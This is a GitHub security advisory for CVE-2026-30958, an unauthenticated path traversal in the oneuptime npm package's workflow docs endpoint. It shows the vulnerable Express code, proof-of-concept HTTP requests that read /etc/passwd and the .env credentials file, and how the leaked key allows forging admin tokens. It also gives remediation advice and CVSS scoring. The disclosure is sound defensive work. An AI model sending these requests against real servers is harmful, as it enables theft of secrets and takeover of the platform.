Skip to content

Path Traversal — Arbitrary File Read (No Auth)

High
simlarsen published GHSA-p2wh-9pw8-hvff Mar 8, 2026

Package

npm oneuptime (npm)

Affected versions

< 10.0.21

Patched versions

10.0.21

Description

Summary

Unauthenticated path traversal in the /workflow/docs/:componentName endpoint
allows reading arbitrary files from the server filesystem.

Details

File: Worker/FeatureSet/Workflow/Index.ts (Lines 29-36)

The componentName route parameter is concatenated directly into a file path
passed to res.sendFile() with no sanitization or authentication middleware.

app.get(
  `/${APP_NAME}/docs/:componentName`,
  (req: ExpressRequest, res: ExpressResponse) => {
    res.sendFile(
      "/usr/src/app/FeatureSet/Workflow/Docs/ComponentDocumentation/" +
        req.params["componentName"],  // UNSANITIZED
    );
  },
);

PoC

GET /workflow/docs/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: <target>

Returns /etc/passwd. More critically:

GET /workflow/docs/..%2F..%2F..%2F..%2F.env HTTP/1.1
Host: <target>

Leaks ENCRYPTION_SECRET, DATABASE_PASSWORD, ONEUPTIME_SECRET,
and other credentials from the environment.

Impact

  • Direct: Unauthenticated arbitrary file read from the server
  • Chained: Leaked ENCRYPTION_SECRET is the JWT signing key — attacker
    can forge admin authentication tokens and gain full control of the platform
  • Affected data: Environment secrets, database credentials, TLS private
    keys, application source code

Remediation:

  • Validate componentName against an allowlist of known documentation files, or
  • Strip path separators and resolve the path, then verify it remains within the intended directory
  • Add authentication middleware

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CVE ID

CVE-2026-30958

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

Credits